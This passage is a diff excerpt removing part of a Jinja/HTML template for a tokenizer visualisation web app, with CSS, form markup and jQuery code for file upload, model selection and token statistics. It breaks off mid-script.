- font-size: 3rem;
746
- margin-bottom: 1rem;
747
- color: var(--primary-color);
748
- }
749
-
750
- .file-upload-icon {
751
- position: fixed;
752
- bottom: 20px;
753
- left: 20px;
754
- width: 45px;
755
- height: 45px;
756
- background-color: var(--card-bg);
757
- border-radius: 50%;
758
- display: flex;
759
- justify-content: center;
760
- align-items: center;
761
- cursor: pointer;
762
- z-index: 100;
763
- box-shadow: 0 2px 10px rgba(0, 0, 0, 0.2);
764
- transition: transform 0.2s ease, box-shadow 0.2s ease;
765
- }
766
-
767
- .file-upload-icon:hover {
768
- transform: translateY(-2px);
769
- box-shadow: 0 4px 15px rgba(0, 0, 0, 0.3);
770
- }
771
-
772
- .file-upload-icon span {
773
- font-size: 1.5rem;
774
- color: var(--primary-color);
775
- }
776
-
777
- .file-info {
778
- position: fixed;
779
- bottom: 20px;
780
- left: 75px;
781
- background-color: var(--card-bg);
782
- color: var(--primary-color);
783
- font-weight: 500;
784
- padding: 0.5rem 1rem;
785
- border-radius: 1rem;
786
- box-shadow: 0 2px 10px rgba(0, 0, 0, 0.2);
787
- max-width: 270px;
788
- white-space: nowrap;
789
- overflow: hidden;
790
- text-overflow: ellipsis;
791
- z-index: 100;
792
- display: none;
793
- }
794
-
795
- .file-detach {
796
- margin-left: 8px;
797
- display: inline-block;
798
- width: 18px;
799
- height: 18px;
800
- background-color: rgba(255, 255, 255, 0.1);
801
- color: var(--text-color);
802
- border-radius: 50%;
803
- text-align: center;
804
- line-height: 16px;
805
- font-size: 12px;
806
- cursor: pointer;
807
- transition: all 0.2s ease;
808
- }
809
-
810
- .file-detach:hover {
811
- background-color: rgba(255, 0, 0, 0.2);
812
- color: #ff6b6b;
813
- transform: scale(1.1);
814
- }
815
-
816
- .preview-notice {
817
- background-color: #273c56;
818
- border: 1px solid #365a82;
819
- color: #89b4e8;
820
- padding: 0.75rem;
821
- border-radius: 0.5rem;
822
- margin-top: 1rem;
823
- font-size: 0.875rem;
824
- display: none;
825
- }
826
-
827
- .custom-model-wrapper {
828
- position: relative;
829
- }
830
-
831
- .model-badge {
832
- position: absolute;
833
- top: -10px;
834
- right: -5px;
835
- background: linear-gradient(135deg, #22c55e 0%, #15803d 100%);
836
- color: white;
837
- font-size: 0.7rem;
838
- font-weight: 700;
839
- padding: 0.25rem 0.5rem;
840
- border-radius: 999px;
841
- transform: scale(0);
842
- transition: transform 0.3s cubic-bezier(0.175, 0.885, 0.32, 1.275);
843
- box-shadow: 0 2px 5px rgba(0, 0, 0, 0.2);
844
- z-index: 10;
845
- }
846
-
847
- .model-badge.show {
848
- transform: scale(1);
849
- }
850
-
851
- .custom-model-help {
852
- display: inline-block;
853
- width: 16px;
854
- height: 16px;
855
- line-height: 16px;
856
- font-size: 11px;
857
- font-weight: bold;
858
- text-align: center;
859
- background-color: var(--secondary-text);
860
- color: var(--card-bg);
861
- border-radius: 50%;
862
- margin-left: 5px;
863
- cursor: help;
864
- vertical-align: middle;
865
- }
866
-
867
- .tooltip {
868
- position: absolute;
869
- top: 100%;
870
- left: 0;
871
- width: 280px;
872
- background-color: #333;
873
- color: #fff;
874
- padding: 0.75rem;
875
- border-radius: 0.5rem;
876
- font-size: 0.8rem;
877
- margin-top: 0.5rem;
878
- z-index: 100;
879
- box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
880
- opacity: 0;
881
- visibility: hidden;
882
- transition: opacity 0.2s, visibility 0.2s;
883
- }
884
-
885
- .custom-model-help:hover + .tooltip {
886
- opacity: 1;
887
- visibility: visible;
888
- }
889
-
890
- /* Tokenizer info icon and tooltip styles */
891
- .tokenizer-info-icon {
892
- display: inline-flex;
893
- align-items: center;
894
- justify-content: center;
895
- width: 24px;
896
- height: 24px;
897
- background: linear-gradient(135deg, var(--primary-color) 0%, var(--primary-hover) 100%);
898
- color: white;
899
- border-radius: 50%;
900
- position: absolute;
901
- left: -32px; /* Position to the left of the selector */
902
- top: 50%;
903
- transform: translateY(-50%);
904
- cursor: pointer;
905
- font-size: 12px;
906
- font-weight: bold;
907
- transition: all 0.2s ease;
908
- z-index: 10;
909
- box-shadow: 0 2px 4px rgba(0, 0, 0, 0.2);
910
- }
911
-
912
- .tokenizer-info-icon:hover {
913
- transform: translateY(-50%) scale(1.1);
914
- box-shadow: 0 3px 8px rgba(0, 0, 0, 0.3);
915
- }
916
-
917
- /* Watermark styles */
918
- .watermark {
919
- position: fixed;
920
- bottom: 20px;
921
- right: 20px;
922
- color: var(--primary-color);
923
- font-size: 1.4rem;
924
- font-weight: 700;
925
- opacity: 0.25; /* Semi-transparent */
926
- z-index: 100;
927
- transition: opacity 0.3s ease;
928
- text-decoration: none;
929
- pointer-events: auto; /* Ensure it remains clickable */
930
- }
931
-
932
- .watermark:hover {
933
- opacity: 0.6; /* Increase opacity on hover */
934
- }
935
-
936
- .tokenizer-info-tooltip {
937
- position: absolute;
938
- top: calc(100% + 8px);
939
- left: -30px; /* Adjust position to align with the icon */
940
- width: 300px;
941
- background-color: var(--card-bg);
942
- color: var(--text-color);
943
- border: 1px solid var(--primary-color);
944
- border-radius: 0.75rem;
945
- box-shadow: 0 5px 15px rgba(0, 0, 0, 0.3);
946
- padding: 1rem;
947
- z-index: 1000; /* Increase z-index to ensure visibility */
948
- opacity: 0;
949
- visibility: hidden;
950
- transition: opacity 0.3s, visibility 0.3s;
951
- pointer-events: none; /* Initially disable pointer events */
952
- }
953
-
954
- .tokenizer-info-icon:not(.tooltip-disabled):hover + .tokenizer-info-tooltip {
955
- opacity: 1;
956
- visibility: visible;
957
- pointer-events: auto;
958
- }
959
-
960
- .tokenizer-info-tooltip:hover {
961
- opacity: 1;
962
- visibility: visible;
963
- pointer-events: auto;
964
- }
965
-
966
- .tokenizer-info-header {
967
- font-size: 1.1rem;
968
- font-weight: 600;
969
- margin-bottom: 0.5rem;
970
- padding-bottom: 0.5rem;
971
- border-bottom: 1px solid rgba(255, 255, 255, 0.1);
972
- color: var(--primary-color);
973
- }
974
-
975
- .tokenizer-info-grid {
976
- display: grid;
977
- grid-template-columns: repeat(2, 1fr);
978
- gap: 0.75rem;
979
- margin: 0.75rem 0;
980
- }
981
-
982
- .tokenizer-info-item {
983
- display: flex;
984
- flex-direction: column;
985
- }
986
-
987
- .tokenizer-info-label {
988
- font-size: 0.75rem;
989
- color: var(--secondary-text);
990
- margin-bottom: 0.25rem;
991
- }
992
-
993
- .tokenizer-info-value {
994
- font-size: 0.95rem;
995
- font-weight: 500;
996
- }
997
-
998
- .special-tokens-container {
999
- margin-top: 0.75rem;
1000
- background-color: rgba(15, 79, 155, 0.1);
1001
- border-radius: 0.5rem;
1002
- padding: 0.5rem;
1003
- max-height: 100px;
1004
- overflow-y: auto;
1005
- }
1006
-
1007
- .special-token-item {
1008
- display: flex;
1009
- justify-content: space-between;
1010
- margin-bottom: 0.25rem;
1011
- font-size: 0.8rem;
1012
- }
1013
-
1014
- .token-name {
1015
- color: var(--secondary-text);
1016
- }
1017
-
1018
- .token-value {
1019
- background-color: rgba(255, 255, 255, 0.1);
1020
- padding: 1px 4px;
1021
- border-radius: 2px;
1022
- font-family: monospace;
1023
- }
1024
-
1025
- .tokenizer-info-loading {
1026
- display: flex;
1027
- justify-content: center;
1028
- align-items: center;
1029
- height: 100px;
1030
- }
1031
-
1032
- .tokenizer-info-spinner {
1033
- width: 30px;
1034
- height: 30px;
1035
- border: 3px solid var(--primary-color);
1036
- border-radius: 50%;
1037
- border-top-color: transparent;
1038
- animation: spin 1s linear infinite;
1039
- }
1040
-
1041
- .tokenizer-info-error {
1042
- color: #f87171;
1043
- font-size: 0.9rem;
1044
- text-align: center;
1045
- padding: 1rem;
1046
- }
1047
-
1048
- @media (max-width: 768px) {
1049
- .header {
1050
- flex-direction: column;
1051
- align-items: stretch;
1052
- gap: 1rem;
1053
- }
1054
-
1055
- .model-selector {
1056
- width: 100%;
1057
- }
1058
-
1059
- .stats-grid {
1060
- grid-template-columns: 1fr;
1061
- }
1062
-
1063
- .tokenizer-info-tooltip {
1064
- width: 250px;
1065
- }
1066
- }
1067
- </style>
1068
- </head>
1069
- <body>
1070
- <!-- Hidden File Drop Zone that appears when dragging files -->
1071
- <div id="fileDropZone" class="file-drop-zone">
1072
- <div class="drop-indicator">
1073
- <div class="file-icon">📄</div>
1074
- <p>Drop your file here</p>
1075
- </div>
1076
- </div>
1077
-
1078
- <!-- File upload icon in bottom left corner -->
1079
- <div id="fileUploadIcon" class="file-upload-icon">
1080
- <span>📎</span>
1081
- </div>
1082
- <p class="file-info" id="fileInfo"></p>
1083
-
1084
- <div class="container">
1085
- <div class="header">
1086
- <div class="title-section">
1087
- <h1 class="title">Token Visualizer</h1>
1088
- <p class="subtitle">Advanced tokenization analysis and visualization</p>
1089
- </div>
1090
- <div class="model-selector">
1091
- <div class="model-selector-header">
1092
- <div class="model-type-toggle">
1093
- <div class="toggle-option predefined-toggle active" data-type="predefined">Predefined</div>
1094
- <div class="toggle-option custom-toggle" data-type="custom">Custom</div>
1095
- </div>
1096
- </div>
1097
- <div id="predefinedModelSelector">
1098
- <div style="position: relative;">
1099
- <div class="tokenizer-info-icon" id="modelInfoIcon" title="View tokenizer information">ℹ</div>
1100
- <!-- TOOLTIP MOVED HERE -->
1101
- <div class="tokenizer-info-tooltip" id="modelInfoTooltip">
1102
- <div id="tokenizerInfoContent">
1103
- <div class="tokenizer-info-loading">
1104
- <div class="tokenizer-info-spinner"></div>
1105
- </div>
1106
- </div>
1107
- </div>
1108
- <!-- SELECT NOW COMES AFTER ICON AND TOOLTIP -->
1109
- <select id="modelSelect" name="model">
1110
- {% for model_id, info in models.items() %}
1111
- <option value="{{ model_id }}" {% if selected_model == model_id %}selected{% endif %}>
1112
- {{ info.alias }}
1113
- </option>
1114
- {% endfor %}
1115
- </select>
1116
- </div>
1117
- </div>
1118
- <div id="customModelSelector" style="display: none;" class="custom-model-wrapper">
1119
- <div style="position: relative;">
1120
- <div class="tokenizer-info-icon" id="customModelInfoIcon" title="View tokenizer information">ℹ</div>
1121
- <div class="tokenizer-info-tooltip" id="customModelInfoTooltip">
1122
- <div id="customTokenizerInfoContent">
1123
- <div class="tokenizer-info-loading">
1124
- <div class="tokenizer-info-spinner"></div>
1125
- </div>
1126
- </div>
1127
- </div>
1128
- <input type="text" id="customModelInput" class="custom-model-input"
1129
- placeholder="Enter HuggingFace model path"
1130
- value="{{ custom_model if custom_model and custom_model|length > 0 else '' }}">
1131
- </div>
1132
- <span class="custom-model-help">?</span>
1133
- <div class="tooltip">
1134
- Enter a valid HuggingFace model ID (e.g., "mistralai/Mistral-7B-Instruct-v0.3")
1135
- The model must have a tokenizer available and must be not restricted. (with some exceptions)
1136
- Also some models have restrictions. You can use mirrored versions, like unsloth to omit that.
1137
- Like ("unsloth/Meta-Llama-3.1-8B-Instruct-bnb-4bit") instead of original path.
1138
- </div>
1139
- <div class="model-badge" id="modelSuccessBadge">Loaded</div>
1140
- </div>
1141
- </div>
1142
- </div>
1143
-
1144
- <div class="error-message" id="errorMessage">{{ error }}</div>
1145
-
1146
- <div class="input-section">
1147
- <form id="analyzeForm" method="POST" enctype="multipart/form-data">
1148
- <textarea name="text" id="textInput" placeholder="Enter text to analyze or upload a file in bottom left corner...">{{ text }}</textarea>
1149
- <input type="hidden" name="model" id="modelInput" value="{{ selected_model }}">
1150
- <input type="hidden" name="custom_model" id="customModelInputHidden" value="{{ custom_model if custom_model else '' }}">
1151
- <input type="hidden" name="model_type" id="modelTypeInput" value="{{ model_type if model_type else 'predefined' }}">
1152
- <input type="file" name="file" id="fileInput" style="display: none;">
1153
- <div class="button-container">
1154
- <button type="submit" id="analyzeButton">Analyze Text</button>
1155
- </div>
1156
- </form>
1157
- </div>
1158
-
1159
- <div id="results" class="results" {% if not token_data %}style="display: none;"{% endif %}>
1160
- <div class="card">
1161
- <h2 class="card-title">Token Visualization</h2>
1162
- <div class="preview-notice" id="previewNotice">
1163
- Note: Showing preview of first 8096 characters. Stats are calculated on the full file.
1164
- </div>
1165
- <div class="token-container" id="tokenContainer">
1166
- {% if token_data %}
1167
- {% for token in token_data.tokens %}
1168
- <span class="token"
1169
- style="background-color: {{ token.colors.background }}; color: {{ token.colors.text }};"
1170
- title="Original token: {{ token.original }} | Token ID: {{ token.token_id }}">
1171
- {{ token.display }}
1172
- </span>
1173
- {% if token.newline %}<br>{% endif %}
1174
- {% endfor %}
1175
- {% endif %}
1176
- </div>
1177
- <button class="expand-button" id="expandButton">Show More</button>
1178
- <div class="display-limit-notice" id="displayLimitNotice">
1179
- Note: Only showing first 50,000 tokens. Total token count: <span id="totalTokenCount">0</span>
1180
- </div>
1181
- </div>
1182
-
1183
- <div class="stats-grid">
1184
- <div class="stat-card">
1185
- <div class="stat-title">Total Tokens</div>
1186
- <div class="stat-value" id="totalTokens">{{ token_data.stats.basic_stats.total_tokens if token_data else 0 }}</div>
1187
- <div class="stat-description">
1188
- <span id="uniqueTokens">{{ token_data.stats.basic_stats.unique_tokens if token_data else 0 }} unique</span>
1189
- (<span id="uniquePercentage">{{ token_data.stats.basic_stats.unique_percentage if token_data else 0 }}</span>%)
1190
- </div>
1191
- </div>
1192
- <div class="stat-card">
1193
- <div class="stat-title">Token Types</div>
1194
- <div class="stat-value" id="specialTokens">{{ token_data.stats.basic_stats.special_tokens if token_data else 0 }}</div>
1195
- <div class="stat-description">special tokens</div>
1196
- </div>
1197
- <div class="stat-card">
1198
- <div class="stat-title">Whitespace</div>
1199
- <div class="stat-value" id="spaceTokens">{{ token_data.stats.basic_stats.space_tokens if token_data else 0 }}</div>
1200
- <div class="stat-description">
1201
- spaces: <span id="spaceCount">{{ token_data.stats.basic_stats.space_tokens if token_data else 0 }}</span>,
1202
- newlines: <span id="newlineCount">{{ token_data.stats.basic_stats.newline_tokens if token_data else 0 }}</span>
1203
- </div>
1204
- </div>
1205
- <div class="stat-card">
1206
- <div class="stat-title">Token Length</div>
1207
- <div class="stat-value" id="avgLength">{{ token_data.stats.length_stats.avg_length if token_data else 0 }}</div>
1208
- <div class="stat-description">
1209
- median: <span id="medianLength">{{ token_data.stats.length_stats.median_length if token_data else 0 }}</span>,
1210
- ±<span id="stdDev">{{ token_data.stats.length_stats.std_dev if token_data else 0 }}</span> std
1211
- </div>
1212
- </div>
1213
- <div class="stat-card">
1214
- <div class="stat-title">Compression</div>
1215
- <div class="stat-value" id="compressionRatio">{{ token_data.stats.basic_stats.compression_ratio if token_data else 0 }}</div>
1216
- <div class="stat-description">characters per token</div>
1217
- </div>
1218
- </div>
1219
- </div>
1220
- </div>
1221
- <a href="https://huggingface.co/spaces/bartar/tokenizers" target="_blank" class="watermark">
1222
- @bartar/tokenizers
1223
- </a>
1224
-
1225
- <script>
1226
- $(document).ready(function() {
1227
- // File handling variables
1228
- let currentFile = null;
1229
- let originalTextContent = null;
1230
- let lastUploadedFileName = null;
1231
- let fileJustUploaded = false; // Flag to prevent immediate detachment
1232
- let currentModelType = "{{ model_type if model_type else 'predefined' }}";
1233
- let currentTokenizerInfo = null;
1234
-
1235
- // Try to parse tokenizer info if available from server
1236
- try {
1237
- currentTokenizerInfo = {{ token_data.tokenizer_info|tojson if token_data and token_data.tokenizer_info else 'null' }};
1238
- if (currentTokenizerInfo) {
1239
- updateTokenizerInfoDisplay(currentTokenizerInfo, currentModelType === 'custom');
1240
- }
1241
- } catch(e) {
1242
- console.error("Error parsing tokenizer info:", e);
1243
- }
1244
-
1245
- // Show error if exists
1246
- if ("{{ error }}".length > 0) {
1247
- showError("{{ error }}");
1248
- }
1249
-
1250
- // Setup model type based on initial state
1251
- if (currentModelType === "custom") {
1252
- $('.toggle-option').removeClass('active');
1253
- $('.custom-toggle').addClass('active');
1254
- $('#predefinedModelSelector').hide();
1255
- $('#customModelSelector').show();
1256
- }
1257
-
1258
- // Show success badge if custom model loaded successfully
1259
- if (currentModelType === "custom" && !("{{ error }}".length > 0)) {
1260
- $('#modelSuccessBadge').addClass('show');
1261
- setTimeout(() => {
1262
- $('#modelSuccessBadge').removeClass('show');
1263
- }, 3000);
1264
- }
1265
-
1266
- // Toggle between predefined and custom model inputs
1267
- $('.toggle-option').click(function() {
1268
- const modelType = $(this).data('type');
1269
- $('.toggle-option').removeClass('active');
1270
- $(this).addClass('active');
1271
- currentModelType = modelType;
1272
-
1273
- if (modelType === 'predefined') {
1274
- $('#predefinedModelSelector').show();
1275
- $('#customModelSelector').hide();
1276
- $('#modelTypeInput').val('predefined');
1277
- // Set the model input value to the selected predefined model
1278
- $('#modelInput').val($('#modelSelect').val());
1279
- } else {
1280
- $('#predefinedModelSelector').hide();
1281
- $('#customModelSelector').show();
1282
- $('#modelTypeInput').val('custom');
1283
- }
1284
-
1285
- // Clear tokenizer info if switching models
1286
- if (modelType === 'predefined') {
1287
- $('#tokenizerInfoContent').html('<div class="tokenizer-info-loading"><div class="tokenizer-info-spinner"></div></div>');
1288
- fetchTokenizerInfo($('#modelSelect').val(), false);
1289
- } else {
1290
- $('#customTokenizerInfoContent').html('<div class="tokenizer-info-loading"><div class="tokenizer-info-spinner"></div></div>');
1291
- // Only fetch if there's a custom model value
1292
- const customModel = $('#customModelInput').val();
1293
- if (customModel) {
1294
- fetchTokenizerInfo(customModel, true);
1295
- }
1296
- }
1297
- });
1298
-
1299
- // Update hidden input when custom model input changes
1300
- $('#customModelInput').on('input', function() {
1301
- $('#customModelInputHidden').val($(this).val());
1302
- });
1303
-
1304
- function showError(message) {
1305
- const errorDiv = $('#errorMessage');
1306
- errorDiv.text(message);
1307
- errorDiv.show();
1308
- setTimeout(() => errorDiv.fadeOut(), 5000);
1309
- }
1310
-
1311
- // Function to update tokenizer info display in tooltip
1312
- function updateTokenizerInfoDisplay(info, isCustom = false) {
1313
- const targetSelector = isCustom ? '#customTokenizerInfoContent' : '#tokenizerInfoContent';
1314
- let htmlContent = '';
1315
-
1316
-
1317
- if (info.error) {
1318
- $(targetSelector).html(`<div class="tokenizer-info-error">${info.error}</div>`);
1319
- return;
1320
- }
1321
-
1322
- // Start building the tooltip content
1323
- htmlContent = `<div class="tokenizer-info-header">Tokenizer Details</div>
1324
- <div class="tokenizer-info-grid">`;
1325
-
1326
- // Dictionary size
1327
- if (info.vocab_size) {
1328
- htmlContent += `
1329
- <div class="tokenizer-info-item">
1330
- <span class="tokenizer-info-label">Dictionary Size</span>
1331
- <span class="tokenizer-info-value">${info.vocab_size.toLocaleString()}</span>
1332
- </div>`;
1333
- }
1334
-
1335
- // Tokenizer type
1336
- if (info.tokenizer_type) {
1337
- htmlContent += `
1338
- <div class="tokenizer-info-item">
1339
- <span class="tokenizer-info-label">Tokenizer Type</span>
1340
- <span class="tokenizer-info-value">${info.tokenizer_type}</span>
1341
- </div>`;
1342
- }
1343
-
1344
-
1345
- // Max length
1346
- if (info.model_max_length) {
1347
- htmlContent += `
1348
- <div class="tokenizer-info-item">
1349
- <span class="tokenizer-info-label">Max Length</span>
1350
- <span class="tokenizer-info-value">${info.model_max_length.toLocaleString()}</span>
1351
- </div>`;
1352
- }
1353
-
1354
- htmlContent += `</div>`; // Close tokenizer-info-grid
1355
-
1356
- // Special tokens section
1357
- if (info.special_tokens && Object.keys(info.special_tokens).length > 0) {
1358
- htmlContent += `
1359
- <div class="tokenizer-info-item" style="margin-top: 0.75rem;">
1360
- <span class="tokenizer-info-label">Special Tokens</span>
1361
- <div class="special-tokens-container">`;
1362
-
1363
- // Add each special token with proper escaping for HTML special characters
1364
- for (const [tokenName, tokenValue] of Object.entries(info.special_tokens)) {
1365
- // Properly escape HTML special characters
1366
- const escapedValue = tokenValue
1367
- .replace(/&/g, '&amp;')
1368
- .replace(/</g, '&lt;')
1369
- .replace(/>/g, '&gt;')
1370
- .replace(/"/g, '&quot;')
1371
- .replace(/'/g, '&#039;');
1372
-
1373
- htmlContent += `
1374
- <div class="special-token-item">
1375
- <span class="token-name">${tokenName}:</span>
1376
- <span class="token-value">${escapedValue}</span>
1377
- </div>`;
1378
- }
1379
-
1380
- htmlContent += `
1381
- </div>
1382
- </div>`;
1383
- }
1384
-
1385
- $(targetSelector).html(htmlContent);
1386
- }
1387
-
1388
- // Function to fetch tokenizer info
1389
- function fetchTokenizerInfo(modelId, isCustom = false) {
1390
- if (!modelId) return;
1391
-
1392
- const targetSelector = isCustom ? '#customTokenizerInfoContent' : '#tokenizerInfoContent';
1393
- $(targetSelector).html('<div class="tokenizer-info-loading"><div class="tokenizer-info-spinner"></div></div>');
1394
-
1395
- $.ajax({
1396
- url: '/tokenizer-info',
1397
- method: 'GET',
1398
- data: {
1399
- model_id: modelId,
1400
- is_custom: isCustom
1401
- },
1402
- success: function(response) {
1403
- if (response.error) {
1404
- $(targetSelector).html(`<div class="tokenizer-info-error">${response.error}</div>`);
1405
- } else {
1406
- currentTokenizerInfo = response;
1407
- updateTokenizerInfoDisplay(response, isCustom);
1408
- }
1409
- },
1410
- error: function(xhr) {
1411
- $(targetSelector).html('<div class="tokenizer-info-error">Failed to load tokenizer information</div>');
1412
- }
1413
- });
1414
- }
1415
-
1416
- function updateResults(data) {
1417
- $('#results').show();
1418
-
1419
- // Update tokens
1420
- const tokenContainer = $('#tokenContainer');
1421
- tokenContainer.empty();
1422
- data.tokens.forEach(token => {
1423
- const span = $('<span>')
1424
- .addClass('token')
1425
- .css({
1426
- 'background-color': token.colors.background,
1427
- 'color': token.colors.text
1428
- })
1429
- // Include token id in the tooltip on hover
1430
- .attr('title', `Original token: ${token.original} | Token ID: ${token.token_id}`)
1431
- .text(token.display);
1432
-
1433
- tokenContainer.append(span);
1434
- if (token.newline) {
1435
- tokenContainer.append('<br>');
1436
- }
1437
- });
1438
-
1439
- // Update display limit notice
1440
- if (data.display_limit_reached) {
1441
- $('#displayLimitNotice').show();
1442
- $('#totalTokenCount').text(data.total_tokens);
1443
- } else {
1444
- $('#displayLimitNotice').hide();
1445
- }
1446
-
1447
- // Update preview notice
1448
- if (data.preview_only) {
1449
- $('#previewNotice').show();
1450
- } else {
1451
- $('#previewNotice').hide();
1452
- }
1453
-
1454
- // Update basic stats
1455
- $('#totalTokens').text(data.stats.basic_stats.total_tokens);
1456
- $('#uniqueTokens').text(`${data.stats.basic_stats.unique_tokens} unique`);
1457
- $('#uniquePercentage').text(data.stats.basic_stats.unique_percentage);
1458
- $('#specialTokens').text(data.stats.basic_stats.special_tokens);
1459
- $('#spaceTokens').text(data.stats.basic_stats.space_tokens);
1460
- $('#spaceCount').text(data.stats.basic_stats.space_tokens);
1461
- $('#newlineCount').text(data.stats.basic_stats.newline_tokens);
1462
- $('#compressionRatio').text(data.stats.basic_stats.compression_ratio);
1463
-
1464
- // Update length stats
1465
- $('#avgLength').text(data.stats.length_stats.avg_length);
1466
- $('#medianLength').text(data.stats.length_stats.median_length);
1467
- $('#stdDev').text(data.stats.length_stats.std_dev);
1468
-
1469
- // Update tokenizer info if available
1470
- if (data.tokenizer_info) {
1471
- currentTokenizerInfo = data.tokenizer_info;
1472
- updateTokenizerInfoDisplay(data.tokenizer_info, currentModelType === 'custom');
1473
- }
1474
- }
1475
-
1476
- // Handle text changes to detach file
1477
- $('#textInput').on('input', function() {
1478
- // Skip if file was just uploaded (prevents immediate detachment)
1479
- if (fileJustUploaded) {
1480
- fileJustUploaded = false;
1481
- return;
1482
- }
1483
-
1484
- const currentText = $(this).val();
1485
- const fileInput = document.getElementById('fileInput');
1486
-
1487
- // Only detach if a file exists and text has been substantially modified
1488
- if (fileInput.files.length > 0 && originalTextContent !== null) {
1489
- // Check if the text is completely different or has been significantly changed
1490
- // This allows for small edits without detaching
1491
- const isMajorChange =
1492
- currentText.length < originalTextContent.length * 0.8 || // Text reduced by at least 20%
1493
- (currentText.length > 0 &&
1494
- currentText !== originalTextContent.substring(0, currentText.length) &&
1495
- currentText.substring(0, Math.min(20, currentText.length)) !==
1496
- originalTextContent.substring(0, Math.min(20, currentText.length)));
1497
-
1498
- if (isMajorChange) {
1499
- detachFile();
1500
- }
1501
- }
1502
- });
1503
-
1504
- // Function to detach file
1505
- function detachFile() {
1506
- // Clear the file input
1507
- $('#fileInput').val('');
1508
- // Hide file info
1509
- $('#fileInfo').fadeOut(300);
1510
- // Reset the original content tracker
1511
- originalTextContent = $('#textInput').val();
1512
- // Reset last uploaded filename
1513
- lastUploadedFileName = null;
1514
- }
1515
-
1516
- // For model changes
1517
- $('#modelSelect').change(function() {
1518
- const selectedModel = $(this).val();
1519
- $('#modelInput').val(selectedModel);
1520
-
1521
- // Fetch tokenizer info for the selected model
1522
- fetchTokenizerInfo(selectedModel, false);
1523
-
1524
- // If text exists, submit the form
1525
- if ($('#textInput').val().trim()) {
1526
- $('#analyzeForm').submit();
1527
- }
1528
- });
1529
-
1530
- // File drop handling
1531
- const fileDropZone = $('#fileDropZone');
1532
- const fileUploadIcon = $('#fileUploadIcon');
1533
-
1534
- // Prevent default drag behaviors
1535
- ['dragenter', 'dragover', 'dragleave', 'drop'].forEach(eventName => {
1536
- fileDropZone[0].addEventListener(eventName, preventDefaults, false);
1537
- document.body.addEventListener(eventName, preventDefaults, false);
1538
- });
1539
-
1540
- function preventDefaults(e) {
1541
- e.preventDefault();
1542
- e.stopPropagation();
1543
- }
1544
-
1545
- // Show drop zone when file is dragged over the document
1546
- document.addEventListener('dragenter', showDropZone, false);
1547
- document.addEventListener('dragover', showDropZone, false);
1548
-
1549
- fileDropZone[0].addEventListener('dragleave', hideDropZone, false);
1550
- fileDropZone[0].addEventListener('drop', hideDropZone, false);
1551
-
1552
- function showDropZone(e) {
1553
- fileDropZone.addClass('active');
1554
- }
1555
-
1556
- function hideDropZone() {
1557
- fileDropZone.removeClass('active');
1558
- }
1559
-
1560
- // Handle dropped files
1561
- fileDropZone[0].addEventListener('drop', handleDrop, false);
1562
-
1563
- function handleDrop(e) {
1564
- const dt = e.dataTransfer;
1565
- const files = dt.files;
1566
- handleFiles(files);
1567
- }
1568
-
1569
- // Also handle file selection via click on the icon
1570
- fileUploadIcon.on('click', function() {
1571
- const input = document.createElement('input');
1572
- input.type = 'file';
1573
- input.onchange = e => {
1574
- handleFiles(e.target.files);
1575
- };
1576
- input.click();
1577
- });
1578
-
1579
- function handleFiles(files) {
1580
- if (files.length) {
1581
- const file = files[0];
1582
- currentFile = file;
1583
- lastUploadedFileName = file.name;
1584
- fileJustUploaded = true; // Set flag to prevent immediate detachment
1585
-
1586
- // Show file info with animation and add detach button
1587
- $('#fileInfo').html(`${file.name} (${formatFileSize(file.size)}) <span class="file-detach" id="fileDetach"><i class="fas fa-times"></i></span>`).fadeIn(300);
1588
-
1589
- // Add click handler for detach button
1590
- $('#fileDetach').on('click', function(e) {
1591
- e.stopPropagation(); // Prevent event bubbling
1592
- detachFile();
1593
- return false;
1594
- });
1595
-
1596
- // Set the file to the file input
1597
- const dataTransfer = new DataTransfer();
1598
- dataTransfer.items.add(file);
1599
- document.getElementById('fileInput').files = dataTransfer.files;
1600
-
1601
- // Preview in textarea (first 8096 chars)
1602
- const reader = new FileReader();
1603
- reader.onload = function(e) {
1604
- const previewText = e.target.result.slice(0, 8096);
1605
- $('#textInput').val(previewText);
1606
-
1607
- // Store this as the original content AFTER setting the value
1608
- // to prevent the input event from firing and detaching immediately
1609
- setTimeout(() => {
1610
- originalTextContent = previewText;
1611
- // Automatically submit for analysis
1612
- $('#analyzeForm').submit();
1613
- }, 50);
1614
- };
1615
- reader.readAsText(file);
1616
- }
1617
- }
1618
-
1619
- function formatFileSize(bytes) {
1620
- if (bytes < 1024) return bytes + ' bytes';
1621
- else if (bytes < 1048576) return (bytes / 1024).toFixed(1) + ' KB';
1622
- else return (bytes / 1048576).toFixed(1) + ' MB';
1623
- }
1624
-
1625
- // Make sure to check if there's still a file when analyzing
1626
- $('#analyzeForm').on('submit', function(e) {
1627
- e.preventDefault();
1628
-
1629
- // Skip detachment check if file was just uploaded
1630
- if (!fileJustUploaded) {
1631
- // Check if text has been changed but file is still attached
1632
- const textInput = $('#textInput').val();
1633
- const fileInput = document.getElementById('fileInput');
1634
-
1635
- if (fileInput.files.length > 0 &&
1636
- originalTextContent !== null &&
1637
- textInput !== originalTextContent &&
1638
- textInput.length < originalTextContent.length * 0.8) {
1639
- // Text was significantly changed but file is still attached, detach it
1640
- detachFile();
1641
- }
1642
- } else {
1643
- // Reset flag after first submission
1644
- fileJustUploaded = false;
1645
- }
1646
-
1647
- // Update the hidden inputs based on current model type
1648
- if (currentModelType === 'custom') {
1649
- $('#customModelInputHidden').val($('#customModelInput').val());
1650
- } else {
1651
- $('#modelInput').val($('#modelSelect').val());
1652
- }
1653
-
1654
- const formData = new FormData(this);
1655
- $('#analyzeButton').prop('disabled', true);
1656
-
1657
- $.ajax({
1658
- url: '/',
1659
- method: 'POST',
1660
- data: formData,
1661
- processData: false,
1662
- contentType: false,
1663
- success: function(response) {
1664
- if (response.error) {
1665
- showError(response.error);
1666
- } else {
1667
- updateResults(response);
1668
-
1669
- // Show success badge if custom model
1670
- if (currentModelType === 'custom') {
1671
- $('#modelSuccessBadge').addClass('show');
1672
- setTimeout(() => {
1673
- $('#modelSuccessBadge').removeClass('show');
1674
- }, 3000);
1675
- }
1676
- }
1677
- },
1678
- error: function(xhr) {
1679
- showError(xhr.responseText || 'An error occurred while processing the text');
1680
- },
1681
- complete: function() {
1682
- $('#analyzeButton').prop('disabled', false);
1683
- }
1684
- });
1685
- });
1686
-
1687
- $('#expandButton').click(function() {
1688
- const container = $('#tokenContainer');
1689
- const isExpanded = container.hasClass('expanded');
1690
-
1691
- container.toggleClass('expanded');
1692
- $(this).text(isExpanded ? 'Show More' : 'Show Less');
1693
- });
1694
-
1695
- // Initialize tokenizer info for current model
1696
- if (currentModelType === 'predefined') {
1697
